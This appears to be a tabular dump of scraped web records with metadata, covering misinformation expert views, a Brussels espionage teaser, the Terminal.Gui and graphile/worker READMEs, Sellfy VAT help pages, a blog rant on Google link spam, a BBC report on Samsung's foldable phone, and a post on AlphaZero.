#### Well, there’s good news and bad news about the information future …
**Jeff Jarvis**, professor at the City University of New York’s Graduate School of Journalism, commented, “Reasons for hope: Much attention is being directed at manipulation and disinformation; the platforms may begin to recognize and favor quality; and we are still at the early stage of negotiating norms and mores around responsible civil conversation. Reasons for pessimism: Imploding trust in institutions; institutions that do not recognize the need to radically change to regain trust; and business models that favor volume over value.”
#### A fear of the imposition of pervasive censorship
**Jim Warren**, an internet pioneer and open-government/open-records/open-meetings advocate, said, “False and misleading information has always been part of all cultures (gossip, tabloids, etc.). Teaching judgment has always been the solution, and it always will be. I (still) trust the longstanding principle of free speech: The best cure for ‘offensive’ speech is MORE speech. The only major fear I have is of massive communications conglomerates imposing pervasive censorship.”
#### People have to take responsibility for finding reliable sources
**Steven Miller**, vice provost for research at Singapore Management University, wrote, “Even now, if one wants to find reliable sources, one has no problem doing that, so we do not lack reliable sources of news today. It is that there are all these other options, and people can choose to live in worlds where they ignore so-called reliable sources, or ignore a multiplicity of sources that can be compared, and focus on what they want to believe. That type of situation will continue. Five or 10 years from now, I expect there to continue to be many reliable sources of news, and a multiplicity of sources. Those who want to seek out reliable sources will have no problems doing so. Those who want to make sure they are getting a multiplicity of sources to see the range of inputs, and to sort through various types of inputs, will be able to do so, but I also expect that those who want to be in the game of influencing perceptions of reality and changing the perceptions of reality will also have ample means to do so. So the responsibility is with the person who is seeking the news and trying to get information on what is going on. We need more individuals who take responsibility for getting reliable sources.” | true | true | true | Experts are split on whether the coming years will see less misinformation online. Those who foresee improvement hope for technological and societal solutions. Others say bad actors using technology can exploit human vulnerabilities. | 2024-10-12 00:00:00 | 2017-10-19 00:00:00 | article | pewresearch.org | Pew Research Center | null | null |
|
3,447,547 | http://www.kym4.com/2/post/2012/01/stop-marketing-start-engaging-lessons-learned-from-unmarketing.html | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
3,648,217 | http://www.extremetech.com/computing/120395-windows-8-consumer-preview-download | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
4,562,561 | http://euobserver.com/foreign/117553 | Intelligence chief: EU capital is 'spy capital' | Andrew Rettman | "I stopped meeting him for lunch because all he did was ask questions and he never said anything about himself," a diplomat on the EU Council's working group for post-Soviet countries once told this website about his friend from the Russian embassy.
In the age of foreign policy "resets" and "win-win" talks, espionage sounds like a thing of the past.
But for Alain Winants, the head of Belgium's state security service, the VSSE, the EU capital currently has more spy activity than a...
Back our independent journalism by becoming a supporting member
Already a member? Login hereAndrew Rettman is EUobserver's foreign editor, writing about foreign and security issues since 2005. He is Polish, but grew up in the UK, and lives in Brussels. He has also written for The Guardian, The Times of London, and Intelligence Online.
Andrew Rettman is EUobserver's foreign editor, writing about foreign and security issues since 2005. He is Polish, but grew up in the UK, and lives in Brussels. He has also written for The Guardian, The Times of London, and Intelligence Online. | true | true | true | The head of Belgium's intelligence service has said Brussels is home to more spies than almost any other city. | 2024-10-12 00:00:00 | 2012-09-17 00:00:00 | article | euobserver.com | EUobserver | null | null |
|
16,405,644 | https://github.com/migueldeicaza/gui.cs#guics---terminal-ui-toolkit-for-net | GitHub - gui-cs/Terminal.Gui: Cross Platform Terminal UI toolkit for .NET | Gui-Cs | - The current, stable, release of Terminal.Gui v1 is .
- The current
`prealpha`
release of Terminal.Gui v2 can be found on Nuget. - Developers starting new TUI projects are encouraged to target
`v2`
. The API is significantly changed, and significantly improved. There will be breaking changes in the API before Beta, but the core API is stable. `v1`
is in maintenance mode and we will only accept PRs for issues impacting existing functionality.
**Terminal.Gui**: A toolkit for building rich console apps for .NET, .NET Core, and Mono that works on Windows, the Mac, and Linux/Unix.
Paste these commands into your favorite terminal on Windows, Mac, or Linux. This will install the Terminal.Gui.Templates, create a new "Hello World" TUI app, and run it.
(Press `CTRL-Q`
to exit the app)
```
dotnet new --install Terminal.Gui.templates
dotnet new tui -n myproj
cd myproj
dotnet run
```
The above documentation matches the most recent Nuget release from the `v2_develop`
branch. Get the v1 documentation here.
See the `Terminal.Gui/`
README for an overview of how the library is structured.
**Terminal.Gui** can be used with any .Net language to create feature rich and robust applications.
Showcase is a place where you can find all kind of projects from simple examples to advanced real world apps that fully utilize capabilities of the toolkit.
The team is looking forward to seeing new amazing projects made by the community to be added there!
The following example shows a basic Terminal.Gui application in C#:
```
// This is a simple example application. For the full range of functionality
// see the UICatalog project
// A simple Terminal.Gui example in C# - using C# 9.0 Top-level statements
using System;
using Terminal.Gui;
Application.Run<ExampleWindow> ().Dispose ();
// Before the application exits, reset Terminal.Gui for clean shutdown
Application.Shutdown ();
// To see this output on the screen it must be done after shutdown,
// which restores the previous screen.
Console.WriteLine ($@"Username: {ExampleWindow.UserName}");
// Defines a top-level window with border and title
public class ExampleWindow : Window
{
public static string UserName;
public ExampleWindow ()
{
Title = $"Example App ({Application.QuitKey} to quit)";
// Create input components and labels
var usernameLabel = new Label { Text = "Username:" };
var userNameText = new TextField
{
// Position text field adjacent to the label
X = Pos.Right (usernameLabel) + 1,
// Fill remaining horizontal space
Width = Dim.Fill ()
};
var passwordLabel = new Label
{
Text = "Password:", X = Pos.Left (usernameLabel), Y = Pos.Bottom (usernameLabel) + 1
};
var passwordText = new TextField
{
Secret = true,
// align with the text box above
X = Pos.Left (userNameText),
Y = Pos.Top (passwordLabel),
Width = Dim.Fill ()
};
// Create login button
var btnLogin = new Button
{
Text = "Login",
Y = Pos.Bottom (passwordLabel) + 1,
// center the login button horizontally
X = Pos.Center (),
IsDefault = true
};
// When login button is clicked display a message popup
btnLogin.Accept += (s, e) =>
{
if (userNameText.Text == "admin" && passwordText.Text == "password")
{
MessageBox.Query ("Logging In", "Login Successful", "Ok");
UserName = userNameText.Text;
Application.RequestStop ();
}
else
{
MessageBox.ErrorQuery ("Logging In", "Incorrect username or password", "Ok");
}
};
// Add the views to the Window
Add (usernameLabel, userNameText, passwordLabel, passwordText, btnLogin);
}
}
```
When run the application looks as follows:
Use NuGet to install the `Terminal.Gui`
NuGet package: https://www.nuget.org/packages/Terminal.Gui
To install Terminal.Gui into a .NET Core project, use the `dotnet`
CLI tool with this command.
```
dotnet add package Terminal.Gui
```
Or, you can use the Terminal.Gui.Templates.
See CONTRIBUTING.md.
Debates on architecture and design can be found in Issues tagged with design.
See gui-cs for how this project came to be. | true | true | true | Cross Platform Terminal UI toolkit for .NET. Contribute to gui-cs/Terminal.Gui development by creating an account on GitHub. | 2024-10-12 00:00:00 | 2017-12-11 00:00:00 | https://opengraph.githubassets.com/2e716e14ae7a2e616d76b8f3604abfd53fd2407186dcbe10df53880f63be8c63/gui-cs/Terminal.Gui | object | github.com | GitHub | null | null |
8,791,750 | http://blog.sellfy.com/new-eu-vat-rules/ | How does Sellfy handle the EU VAT laws and Brexit? | Sellfy UAB | # How does Sellfy handle the EU VAT laws and Brexit?
**In this article:**
How do I comply with both EU and UK VAT laws as a seller?
What does Sellfy do to help me with VAT?
How do I enable VAT collection?
How do I register to sell as a VAT Mini One Stop Shop (VAT MOSS)?
How do I block sales from the EU or the UK?
The VAT MOSS and UK VAT data reports
Further reading for VAT-related topics
## How do I comply with both EU and UK VAT laws as a seller?
Both the European Union and the United Kingdom charge VAT (value-added tax) for digital and physical product sales. This tax is charged based on the country where the buyer is located, as opposed to the seller's location. The rules regarding each of these taxes will vary, for any questions please contact your local tax authority.
**Important! **On January 1st of 2021, the United Kingdom left the European Union and completed its "Brexit" transition period. The UK is no longer a member of the EU and as such will have its own rules regarding tax collection and reporting. This affects both the taxes for those *located in* and *selling to* the United Kingdom.
As a seller of digital or physical goods, your options will differ where you are located.
#### Located outside of the EU (United States, United Kingdom, Canada)
- To sell in the UK, you will register with HMRC and collect UK VAT on orders
- To sell in the EU, you will need to register for a Non-union scheme VAT MOSS or VAT mini-one-stop-shop (Generally considered easiest!) or register to pay VAT in every EU member state in which you sell
- Alternatively, you may stop selling to the customers in the EU or UK altogether
#### Located in the European Union
- To sell in the EU, you will need to register for a VAT MOSS or VAT mini-one-stop-shop (Generally considered easiest!) or register to pay VAT in every EU member state in which you sell
- To sell in the UK, you will register with HMRC and collect UK VAT on orders
- Alternatively, you may stop selling to the customers in the EU or UK altogether
If you decide that you will be selling to the UK and the EU, make sure to enable the tax collection in your Taxes section.
**Note:** This is not legal advice. If you have questions or concerns, please consult your lawyer and/or accountant, who will be in a better position to advise you on your legal rights and liabilities.
## What does Sellfy do to help me with VAT?
Sellfy helps you maintain compliance with the new regulations. We'll make it easy for you to collect VAT on any order placed in the EU. We'll** identify the buyer's location***, ***charge the appropriate tax** and **provide a VAT MOSS report** that contains all the information that you need for your single calendar quarterly return. See here how to enable the collection of this information in Tax Settings.
#### Determining the buyer's location
Following both HMRC and European Commission requirements, we store two non-contradictory identifiers of the buyer’s location, based on:
- The IP address
- Customer’s own choice of a country
- Credit card (or Paypal) information
#### Charging the appropriate tax for the EU
We'll do the messy work for **EU VAT** collection, and keep track of all current tax rates for each EU country. Once a buyer's location is determined, we charge the right percentage of tax for that country. Keep in mind, that you won’t be able to edit the VAT rates for individual countries, we'll make sure that all the rates are up to date.
For **UK VAT** collection, we will set the correct rate, just select **Add new** to add the United Kingdom to your list of locations for tax collection.
If you have any questions on this, feel free to email into [email protected].
#### Provide a UK VAT and VAT MOSS data report
If you choose to sell to the UK, then you'll be able to pull a report with any UK VAT collected. You'll need to submit a UK VAT return and any payments due to HM Revenue and Customs (HMRC) on a quarterly basis.
If you choose to go ahead with VAT MOSS, you’ll only have to submit a *single calendar quarterly return* and VAT payment and the Member State will then take care of the rest, by sending all the “appropriate information and payment to each relevant member state’s tax authority.” We'll compile all needed information into one report, that you export whenever you need it. Read more here.
## How do I enable VAT collection?
To start collecting taxes and collect the information needed for VAT, you'll:
- Go to your
**Store Settings** - Select
**Taxes** **Enable tax**in your store- Enable sales from the EU and/or the UK
- If selling to the UK add this location
- Optionally, you can select for these taxes to be included in the product price and/or charge taxes on your shipping costs as well.
- Press
**Save**
## How do I register to sell as a VAT Mini One Stop Shop (VAT MOSS)?
**Important! **UK businesses that had been using the UK VAT MOSS union scheme can continue to use the system but must register for the VAT MOSS non-union scheme in an EU member state.
To register for the VAT MOSS, please go here: EU VAT MOSS scheme registration.
Please remember, we aren't tax advisors, so we won't be able to guide you on your business choices, instead, you'll ask an attorney or your tax accountant. For more information and a full list of MOSS registration portals, including one in your country, visit the European Commission website.
If you choose to go ahead with VAT MOSS, you’ll only have to submit a *single calendar quarterly return* and VAT payment and the Member State will then take care of the rest, by sending all the “appropriate information and payment to each relevant member state’s tax authority.”
After you register, we'll help you collect the required EU VAT taxes. Read how to enable VAT collection here. For UK VAT, be sure to manually set the tax rates.
## How do I block sales from the EU or the UK?
If you'd rather stop selling in the EU and/or the UK rather than register for paying the respective VAT, you can easily do so! Follow the steps below.
- Log in to your
**Sellfy account** - Navigate to your
**Store Settings** - Select
**Taxes** **Enable tax**in your store**Choose "Don't allow purchase from European Union" and/or "Don't allow purchases from the United Kingdom".**- Press
**Save**
This will block all purchases from the EU and/or the UK, which means that you don't need to collect, register or report VAT for either. Please remember that we are not tax advisors, so if you have concerns or questions, please contact an attorney or an accountant.
## The VAT MOSS and UK data reports
If you've enabled your Taxes Sellfy collects information required for UK VAT and VAT MOSS reports and then provides this data to you for tax purposes. The report is accessible to you at any time in your Sellfy account and can be generated based on custom months and years. You'll simply export the report.
This report will contain:
- The countries where your buyers were located
- The subtotal of a purchase
- Tax amount charged
- Purchase Total
- The currency of the purchase
To export either report:
- Log in to your
**Sellfy Account** - Navigate to
**Store Settings >****Taxes** - Scroll down to
**VAT MOSS report** - Select the region, month(s), and year from the dropdown menu
- Click
**Export data**
## Further Reading
Here are some helpful links for you to read further about these new regulations affecting your business practices. These sites are not affiliated with Sellfy, but may offer you further insight!
Articles on EU VAT
The Guardian article on New EU VAT regulations
EU-VAT GitHub repo with relevant links
Articles on UK VAT and Brexit | true | true | true | In this article: How do I comply with both EU and UK VAT laws as a seller? What does Sellfy do to help me with VAT? How do I enable VAT collection? How do I reg | 2024-10-12 00:00:00 | 2023-06-29 00:00:00 | null | website | sellfy.com | docs.sellfy.com | null | null |
14,040,344 | https://www.linuxfoundation.org/announcements/networking-industry-leaders-join-forces-to-expand-new-open-source-community-to-drive | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
3,602,529 | http://learntoduck.com/startups/power-of-no/ | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
11,710,930 | https://medium.com/@tryexceptpass/a-python-ate-my-gui-971f2326ce59#.r71wrkqfq | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
321,450 | http://arstechnica.com/news.ars/post/20081001-gimp-2-6-released-one-step-closer-to-taking-on-photoshop.html | GIMP 2.6 released, one step closer to taking on Photoshop | Ryan Paul | A new release of the venerable GNU Image Manipulation Program (GIMP) is now available for download. Version 2.6 offers a variety of new features, user interface improvements, and is also the first release to include support for the Generic Graphics Library (GEGL), a powerful, graph-based image editing framework.
The GIMP is an open source graphics editor that is available for Linux, Windows, and OS X. It aims to provide Photoshop-like capabilities and offers a broad feature set that has made it popular with amateur artists and open source fans. Although the GIMP is generally not regarded as a sufficient replacement for high-end commercial tools, it is beginning to gain some acceptance in the pro market.
One of the most significant limitations of the GIMP is that it has traditionally only supported 8 bits per color channel. This weakness is commonly cited as a major barrier to GIMP adoption by professional artists, who require greater color depth. This problem has finally been addressed by the new GEGL backend, which delivers support for 32-bpc. The inclusion of GEGL is a major milestone for the GIMP and takes it one step closer to being a viable Photoshop replacement for professional users. In this release, GEGL is still not quite ready to be enabled by default, but users can turn it on with a special option.
GIMP 2.6 also includes some minor user interface enhancements. The application menu in the tool palette window has been removed, and its contents have been merged into the document window menu. A document window will now be displayed at all times, even when no images are open. The floating tool windows have also been adjusted so that they are always displayed over the document window and cannot be obscured. To reduce clutter and make the windows easier to manage, the floating windows will no longer be listed in the taskbar. | true | true | true | GIMP 2.6 has been officially released. The new version is the first to include … | 2024-10-12 00:00:00 | 2008-10-02 00:00:00 | article | arstechnica.com | Ars Technica | null | null |
|
1,471,227 | http://www.searchenginepeople.com/blog/google-stop-the-rot-please.html | Google Stop The Rot Please | Bwelford; Barry Welford | ## Sorry For The Rant
Some may see this post as a rant, and to an extent it is. However it reflects a feeling I have on many occasions and I am sure many others feel the same. I will describe the trigger for this rant a little later in the post, but let us explore why anyone might be upset at some of the things that Google does.
## Google Irritations
It is not difficult to find topics on which Google products generate often strong concerns. You have for example Google Maps, which is notorious for having incorrect information. In this part of the continent, the biggest boo-boo was the omission of the Golden Ears Bridge for almost twelve months after it was in operation. However there are many other errors as can be seen by checking the Help Forum on Google Maps.
Nor are we talking about Google Street View with the privacy concerns that people have raised. When it comes to even eavesdropping on broadband communications, it is not surprising that strong resentments are raised..
You also can get some off-the-wall products when you allow your engineers to pursue their own passions under that famous 20-percent time rule.
We offer our engineers "20-percent time" so that they are free to work on what they are really passionate about. Google Suggest, AdSense for Content and Orkut are among the many products of this perk.
Google Buzz was one of these frustrating diversions, which has not seemed to attract too many adherents. This rant is not about one of these peripheral applications but relates instead to the very core of their principal business, Search.
## What Is Wrong With Google Search
Google is continually making innovations in the way it displays search results. One such was universal search where a request for a simple query might produce results not only ifrom regular web pages but also in news and in videos. More recently it has changed the look of the search results pages quite dramatically with a three column layout. It also is producing personalized results whereby no two people will necessarily get the same result when they do a keyword. search.
None of these innovations are particularly irritating and indeed sometimes improve the value to the searcher. What is irritating about Google search goes to the very heart of its algorithms.
Perhaps one of the three similar e-mails I received today can give you a clue on what is my main beef with Google. This was the trigger that pushed me to write this post today, but it could have happened on many other days. It started off as follows:
Dear Sir \ Madam,
We are a Delhi-NCR, India based, and leading web services company with main competency in link building.
We have a dedicated team of 30 professionals to serve you. We build the natural quality and theme based links as one-way or reciprocals links with our manual process.
We always adopt the ETHICAL LINK building process/white hat technique; also follow the guidelines of Google and major search engine for SEO result.
Website theme doesn't matter for us, we can manage any theme, and currently we are running finance /Education / SEO/ IT/ Computer/ Gift/ law/ insurance/ Arts/ Casinos/ Automotive/Pet/ Travel and site etc.
We strictly work on performance basis and can assure you of getting quality links for your site as well. Our links building service will help to increase the link popularity of your website.
What we are dealing with here are spam messages from self-styled link experts.
## The Link Industry
The actions of Google have indeed created a whole new industry. Many people now believe that the rule for getting higher rankings in Google search results are to have as many links as possible to your website. To meet this new demand, some webmasters even create web directories to multiply up the linking possibilities.
Given that it is tedious work, a whole new set of link experts have emerged to handle these dissatisfying chores.
## How Did Google Create This Link Industry?
This link industry is very much a Google creation, even though they might wish it were not so. PageRank, which they have promoted strongly as the defining principle of their search approach, is boosted by having more inlinks to a web page. Unfortunately Google has compounded the problem by being somewhat mysterious about how exactly links may influence PageRank calculations. They defend their approach by indicating that to reveal too much information could cause some to take actions to ensure that their Web pages rank higher than they deserve, given their content.
This lack of clarity has had an unfortunate effect. There is a prevailing view that any link is worth something, provided it does not come from a bad neighborhood. There are as a result many people who would give credence to the arguments presented in the e-mail message above. If anything the situation seems to get worse and worse.
The result is a lose / lose / lose proposition for all. The search engines have difficulty distilling the useful, original content websites from the hordes of websites created purely to generate extra links. Reputable SEO advisors are presented with new challenges in trying to persuade their clients that many links do not justify any efforts in trying to establish them. Thirdly searchers may well find that keyword searches produce less relevant results with this mounting tide of irrelevant rubbish.
## Google Should Clean Up Its Mess
Since this intolerable situation has been created by Google, it is not unreasonable that they should attempt to clean up the mess.
Google maintains an aura of mystery around its methodology so it is difficult for others to comment. However the following proposal is offered as a way of trying to give a very clear message that this ever increasing plethora of links is valueless and people should spend no time or effort on them.
The key element in the proposal is a two-step process for handling the PageRank component of the Google algorithm.
- Step 1: Calculate PageRank for all links as at present.
- Step 2: In the Google algorithm, a Modified PageRank should be used. For all links with a PageRank value below a certain cut-off value, the Modified PageRank would be set at 0. In effect such links are valueless in terms of PageRank contribution for the algorithm.
Clearly this proposal is made without detailed knowledge of the algorithmic mechanisms that Google is using and so may not be applicable. However it may be that with such knowledge an alternative approach can be derived that delivers the same effect. The effect required is that the vast proportion of links have zero value in terms of the algorithm.
In all probability, nothing of value would be lost in this approach. Authoritative links that had attracted a significant amount of PageRank would not be affected.
## Google Should Publicize This New Search Basis Widely
If Google can implement a scheme whereby only authoritative links are taken into account in the algorithm, then this is something that should be publicized strongly. The effect on search results is also likely to be positive, but the main effect would be the removal of those who attempt to sell massive link building services.
At the same time Google could also stop showing the toolbar PageRank, which seems to have few positive attributes and many negative effects. This too would help to suppress the linking spam agents.
While it is in a clean-up frame of mind, it might even consider removing the "I'm feeling lucky" button on its classical search page since this is very rarely used by anyone. However since it seems to be part of the corporate psyche, its removal is perhaps no more likely than Google accepting the main proposal here to deal with spammy links.
I agree and have written about this a few times in the past year.
http://www.blindfiveyearold.com/the-link-bubble
http://www.blindfiveyearold.com/google-heisenberg-problem
Google did create the problem and I think they’re beginning to address it. They’re attacking the type of links you reference – the low value, astroturf type of link generators. Have neutralized these from the algorithm? No. But I think they’re making progress.
I’m more concerned with the bigger players. Folks like Demand Media, who I see less as a content farm and more as a link factory. Bigger enterprises can create processes and networks that drive faux trust and authority, drowning out the real signal.
How will Google address link factories, or links between parent and subsidiary companies? Or will Google find a different, or better way to measure trust and authority?
I don’t know, but Google should figure it out … and quick.
.-= AJ Kohn recently posted: Google AJAX Search Results =-.
What about small, new, local sites who would logically mainly get links from other small, local sites? Should their rankings should be based soley on content? Shouldn’t such a site with more low-pr links get higher rankings than another, similar site with fewer low-pr links?
.-= Cathy Reisenwitz recently posted: Add a privacy policy for that extra SEO oomph =-.
That’s a good point, Cathy. However I believe that the PageRank concept for non-authoritative web pages has been completely polluted by the mass link creators. So yes I do believe that they should rely on content. Of course their competitors must do so as well, so the playing field is level.
.-= Barry Welford recently posted: Google Duplicate Content And WordPress – An Unresolved Problem =-.
While I think that Google’s algo isn’t perfect, to think that you somehow hold the magical key that will somehow eliminate spam, paid links, and create a better index is simply absurd.
Google knows more about the positives and negatives to their approach than you do, and I can guarantee that they deliberate how to improve things on a regular basis.
Search would be nothing without taking into consideration inbound links, bottom-line. There is currently no other way to determine who ranks. Maybe you have outsmarted the entire Google search team and have a unique idea, probably not.
Do you even practice real seo?
Hardly a magical key. 🙂 Just a small suggestion for improving results.
I fear, dear Roland, you were not reading carefully. I was not suggesting that all inlinks should be disregarded and I never mentioned paid links.
.-= Barry Welford recently posted: Google Duplicate Content And WordPress – An Unresolved Problem =-.
What you are suggesting is that Google created its own mess…? Not sure that I fully agree. Google tries to set rules to govern their search results. They have said over and over that buying or building artificial links is bad and your site will be penalized for it. Webmasters on the other hand look at the situation and see the sign that says “Sharks. Swim at your own risk.” and decide to jump in and take the risk since there is a treasure chest sitting on the ocean floor.
Can we really blame the government for speeding just because they set a speed limit? Or perhaps the speeding is a result of insufficient police officers to patrol the streets.
I feel that perhaps it is a group effort. I believe that google is doing the best they can. I am as frustrated as anyone else that links rule the world, but I do see the logic behind it.
And a little tip from SMX, there are many that are hearing Google’s underlying message that directories and content farms are being weeded out.
.-= Thos003 recently posted: Pest Control Links =-.
Thos003, I don’t feel your government example is an exact analogy. It was Google alone that said that inlinks have importance as a measure of the relevance of web pages. By saying that, rather than keeping their finding a trade secret, they caused a major distortion on the way the Internet has developed. It wouldn’t matter if they were ASK and had only a minor share of the search market. It becomes catastrophic when they dominate by far the search market. They planted the seeds that would destroy the value of their approach. By now, I think the PageRank approach has little merit. However it’s become their key marketing tool and they are unlikely to abandon it. If they did, what distinguishes them from Bing and Yahoo?
.-= Barry Welford recently posted: Google Duplicate Content And WordPress – An Unresolved Problem =-.
Yeah, it’s a rant. And I agree that it’s a mess. I get a dozen emails like that every day and I’ve learned a long time ago that they aren’t worth the paper they’ll never be printed on. But the fact is that whatever Google does, these guys will be there, riding their coattails.
Ironically, I think Google watches more closely those authoritative sites (PR8, PR9, for example) for signs of link-selling. | true | true | true | The format of the Google algorithm with its PageRank emphasis on inlinks encourages spammy linking activity. A solution is proposed to stop this. | 2024-10-12 00:00:00 | 2010-06-29 00:00:00 | article | searchenginepeople.com | Search Engine People Blog | null | null |
|
23,589,987 | https://github.com/graphile/worker | GitHub - graphile/worker: High performance Node.js/PostgreSQL job queue (also suitable for getting jobs generated by PostgreSQL triggers/functions out into a different work queue) | Graphile | Job queue for PostgreSQL running on Node.js - allows you to run jobs (e.g. sending emails, performing calculations, generating PDFs, etc) "in the background" so that your HTTP response/application code is not held up. Can be used with any PostgreSQL-backed application. Pairs beautifully with PostGraphile or PostgREST.
To help us develop this software sustainably, we ask all individuals and businesses that use it to help support its ongoing maintenance and development via sponsorship.
And please give some love to our featured sponsors 🤩:
The Guild * |
Dovetail * |
Stellate * |
Steelhead * |
LatchBio * |
** Sponsors the entire Graphile suite* | true | true | true | High performance Node.js/PostgreSQL job queue (also suitable for getting jobs generated by PostgreSQL triggers/functions out into a different work queue) - graphile/worker | 2024-10-12 00:00:00 | 2019-03-01 00:00:00 | https://opengraph.githubassets.com/0af94893a496bcb2991c1c9aff88df1d71ff3cc6b6403881b0b7c12aac2a2444/graphile/worker | object | github.com | GitHub | null | null |
18,402,883 | https://www.bbc.com/news/technology-46130071 | Samsung folding smartphone revealed to developers | Leo Kelion | # Samsung folding smartphone revealed to developers
**Samsung has unveiled a folding handset at an event in San Francisco.**
It described its Infinity Flex Display as "the foundation of the smartphone of tomorrow" and said it intended to start production within months.
When unfolded, the device resembles a 7.3in (18.5cm) tablet. When closed, a separate smaller "cover display" on the handset's other side comes into use.
Samsung has teased the concept for more than five years and had been vying with Huawei to show off a device first.
However, both were upstaged a week ago when little-known start-up Royole unveiled a foldable phone of its own.
Unlike Royole's FlexPai, Samsung obscured the final look of its device. It placed it in a case to hold off revealing the design until a later event.
It also did not disclose how it will brand the phone.
However, it did reveal that the forthcoming handset would be able to run three apps at once.
Justin Denison, the executive who unveiled the handset, noted that when folded up the device fitted "neatly inside" a jacket pocket thanks to the displays involved being thinner than those on earlier phones.
Unlike the FlexPai, the two sides of Samsung's device lie flat when closed. But this comes at the cost of there being noticeable breaks in its bezel, at least on the prototype demoed.
Shipments of Samsung's smartphones were 13.4% lower in the July-to-September quarter than for the same period the previous year, according to market research firm IDC.
Although the sector as a whole shrank over the 12 months, the South Korean firm still underperformed, with its market share slipping from 22.1% to 20.3%.
But analysts say a flexible phone has the potential to strengthen Samsung's brand and boost interest in its wider family of devices.
"We've already had squeezable, swivel, clamshell and even foldable phones," commented IDC's Marta Pinto.
"Differentiation is super important. Samsung's smartphone sales are declining as it faces serious competition from Huawei and other Chinese brands.
"If it can bring a new and really interesting device to the market it could be a chance to regain momentum and return to growth."
#### Allow Twitter content?
**‘accept and continue’**.
Google is also holding a developer event of its own for Android programmers.
One of its engineering chiefs announced that it would soon add support to the operating system to allow other manufactures to create foldable phones of their own.
It also tweeted an animation of the concept in action.
#### Allow Twitter content?
**‘accept and continue’**.
## Analysis: Dave Lee, North America technology reporter
Finally, some interesting innovation in the smartphone space. Or smartphone and tablet space, I guess you could say.
A new form factor can be a huge boost to device-makers, but only if it makes sense.
A flip phone made previously big devices pocket-sized, and then smartphones brought button-less interaction to our palms.
But what will foldable screens bring?
One of the reasons why Samsung teased this device at its developers conference was to give software-makers a chance to think about how to make the most of the new possibilities a foldable screen might bring.
There's a reason why just about every new smartphone up until today looked the same: it worked.
To go foldable, there's likely to be big trade-offs on price, screen quality and perhaps weight - the device Samsung teased today did look chunky.
I'll hold back on a verdict until I get a chance to hold one for myself.
**IBM Simon:** The first mobile phone to offer a touchscreen user-interface - but its battery only lasted an hour.
**Siemens S10: **The first handset with a colour display - although only red, green, blue and white could be shown.
**LG Prada: **The handset debuted a capacitive touchscreen - detecting finger taps by changes in the display's electrical field rather than pressure.
**iPhone: **Apple made use of "multi-touch", detecting several points of contact - allowing pinch-to-zoom and other interactions.
**Nokia N85:** First phone with an OLED (organic light-emitting diode) display, letting it show deeper blacks and better contrast.
**Samsung Galaxy Note: **Although not the first "phablet", the handset proved there was demand for a 5+ inch display, despite claims it was "comically huge".
**LG G Flex: **The curved design was derided as being a gimmick, but points the way to the true "bendy" phones of the future.
**Sharp Aquos Crystal: **The phone's "edgeless" look foreshadowed today's trend to keep bezels to a minimum.
**Samsung Galaxy Note Edge: **Samsung's first handset to wrap its screen over one its sides used the extra space for notifications and app shortcuts.
**Sony Xperia Z5 Premium: **The smartphone premiered a 4K display before it was easy to obtain such ultra-high definition mobile content.
**Essential Phone: **The start-up beat Apple to featuring a camera notch in its display, which allowed the rest of the screen to extend upwards.
**Royole FlexPai:** The California-based start-up surprised the industry when it revealed the "world's first foldable phone" last month. | true | true | true | Samsung unveils a folding handset that turns into a tablet at an event in San Francisco. | 2024-10-12 00:00:00 | 2018-11-07 00:00:00 | reportagenewsarticle | bbc.com | BBC News | null | null |
|
18,699,539 | http://www.cachestocaches.com/2018/12/toward-real-world-alphazero/ | DeepMind's AlphaZero and The Real World | Gregory J Stein | AlphaZero is incredible. If you have yet to read DeepMind’s blog post about their recent paper in Science detailing the *ins and outs* of their legendary game-playing AI, I recommend you do so. In it, DeepMind’s scientists describe an intelligent system capable of playing the games of Go, Chess, and Shogi at superhuman levels. Even legendary chess Grandmaster Garry Kasparov says the moves selected by the system demonstrate a “superior understanding” of the games. Even more remarkable is that AlphaZero, a successor to the well-known AlphaGo and AlphaGo Zero, is trained entirely via *self-play* — it was able to learn good strategies without any meaningful human input.
So do these results imply that Artificial General Intelligence is soon-to-be a solved problem? Hardly. There is a massive difference between an artificially intelligent agent capable of playing chess and a robot that can solve practical real-world tasks, like exploring a building its never seen before to find someone’s office. AlphaZero’s intelligence derives from its ability to make predictions about how a game is likely to unfold: it learns to predict which moves are better than others and uses this information to think a few moves ahead. As it learns to make increasingly accurate predictions, AlphaZero gets better at rejecting “bad moves” and is able to simulate deeper into the future. But the real world is almost immeasurably complex, and, to act in the real world, a system like AlphaZero must decide between a nearly infinite set of possible actions at every instant in time. Overcoming this limitation is not merely a matter of throwing more computational power at the problem:
Using AlphaZero to solve real problems will require a change in the way computers represent and think about the world.
Yet despite the complexity inherent in the real world, humans are still capable of making predictions about how the world behaves and using this information to make decisions. To understand how, we consider how humans learn to play games.
Humans are actually pretty good at playing games like Chess and Go, which is why outperforming humans at these games have historically marked milestones for progress in AI. Like AlphaZero, humans develop an intuition for how they expect the game to evolve. Expert human players use this intuition to prefer likely moves and configurations of the world and to inform better decision making.
The conclusion that experts rely more on structured knowledge than on analysis is supported by a rare case study of an initially weak chess player, identified only by the initials D.H., who over the course of nine years rose to become one of Canada’s leading masters by 1987. Neil Charness, professor of psychology at Florida State University, showed that despite the increase in the player’s strength, he analyzed chess positions no more extensively than he had earlier, relying instead on a vastly improved knowledge of chess positions and associated strategies.
The game of Chess is often analyzed in terms of abstract board positions and Chess openings/endgames are also frequently taught as groups of moves, as in the Rule of the Square. Rather than thinking of individual moves, people are capable of thinking in terms of *sequences of moves*, which allows them to think about the board deeper into the future, once the sequence is executed. Expert players learn to develop an *abstract* representation of the board, in which fine-grained details may be ignored. Imagining the impact of moves and move sequences becomes a question of how the overall structure of the board will change, rather than the precise positions of each of the pieces.
It could be argued that AlphaZero is also capable of recognizing abstract patterns, since it too is capable of making predictions about who is likely to win. However, AlphaZero is structured such that it must explicitly construct future states of the board when imagining the future and cannot learn to plan completely in the abstract.
It could be argued that AlphaZero is also capable of recognizing abstract patterns, since it too is capable of making predictions about who is likely to win. However, AlphaZero is structured such that it must explicitly construct future states of the board when imagining the future and cannot learn to plan completely in the abstract.
